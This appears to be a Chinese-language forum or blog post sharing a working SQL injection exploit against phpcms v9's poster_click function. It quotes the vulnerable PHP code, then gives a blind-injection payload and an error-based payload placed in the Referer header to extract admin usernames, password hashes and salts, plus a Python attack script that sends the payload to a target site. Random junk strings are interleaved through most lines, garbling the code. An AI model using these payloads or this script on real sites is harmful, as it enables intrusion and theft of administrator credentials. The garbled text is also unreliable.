phpcms post_click注入0day利用代码

admin

有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
: O# Y: ^& u& e# U/ z
* C* @, d# Y+ D% J+ S7 R2 e* M. w# |! J问题函数\phpcms\modules\poster\index.php

public function poster_click() {
# j1 M" x' e" d, @$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
" d5 A2 O; c- C& g4 s6 t& C$r = $this->db->get_one(array('id'=>$id));
if (!is_array($r) && empty($r)) return false;
. K: N( i3 @* [( ?$ @( i$ip_area = pc_base::load_sys_class('ip_area');
# \, i/ f% O; _4 z9 z$ip = ip();
2 Y. e! e% j" U$area = $ip_area->get($ip);
5 j) l: _* N) T: q* f% R$username = param::get_cookie('username') ? param::get_cookie('username') : '';
if($id) {
8 C. Q5 u( F  `  _/ N  B2 w$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
}
2 r2 D; a: o$ ~# L$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
2 b4 V; T- g4 J- A! A  \. j$setting = string2array($r['setting']);
if (count($setting)==1) {
4 ~  c& L4 h! a* x) }0 I$ G: V$ N$url = $setting['1']['linkurl'];
- }/ I2 h4 ]8 U- Q( ^* q} else {
# H+ y- d, W& V4 R/ L: s/ }  H4 c$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
}
header('Location: '.$url);
; N3 ?" _7 M9 ?/ r}
& ^* g: \) X7 j

6 L3 F2 ^+ j/ M0 N
利用方式：

2 C. U# F, b. s6 g2 {: G1、可以采用盲注入的手法：

, I: i9 q4 n, X5 Rreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#

通过返回页面，正常与否一个个猜解密码字段。
9 k9 {, p5 k" j/ Y' V) D# K: |! A
! n1 P% k7 ]1 J# J2、代码是花开写的，随手附上了：

1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

& P- U6 a) Q; k2 b" [此方法是爆错注入手法，原理自查。
0 r9 F$ G+ O& Q8 F$ }/ e
4 r7 C! J% G. t* q% d

利用程序:
& z7 s  p) o! \) U
#!/usr/bin/env python
! P2 D, [3 P; C2 s. |9 aimport httplib,sys,re
7 v% |/ j' [" z+ I. L6 O) p5 P
- X/ P. j% D2 Y, L3 cdef attack():
print “Code by Pax.Mac Team conqu3r!”
6 T+ j3 i" K" a3 [# p6 N6 Uprint “Welcome to our zone!!!”
, n' D* o5 g8 p' W% d2 Jurl=sys.argv[1]
# E* t7 U- ^# t' i6 N2 Tpaths=sys.argv[2]
9 b- r$ i$ |2 @1 i3 nconn = httplib.HTTPConnection(url)
8 H  e" V, v5 Q5 g* J# j- {8 si_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
" ^1 v/ g; C2 \) O: z8 C“Accept”: “text/plain”,
  G$ P: q  @, g2 q' |3 o$ ^# g“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
1 r* \* ~5 \; U0 A0 Oconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
0 `* W  F& X; pr1 = conn.getresponse()
0 S- i1 a) |& x9 _7 j7 \$ Z+ N# bdatas=r1.read()
3 P4 ]7 h5 ^9 w$ m& wdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
( P# h" q$ g1 U; }/ _$ q. P' w. ]+ X; Sprint datas[0]
conn.close()
if __name__==”__main__”:
; }! ]- R9 u/ Q- w) P; N, ]. [if len(sys.argv)<3:
print “Code by Pax.Mac Team conqu3r”
print “Usgae:”
print “    phpcmsattack.py   www.paxmac.org /”
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
sys.exit(1)
0 ]. Y7 Y, L% Q$ Mattack()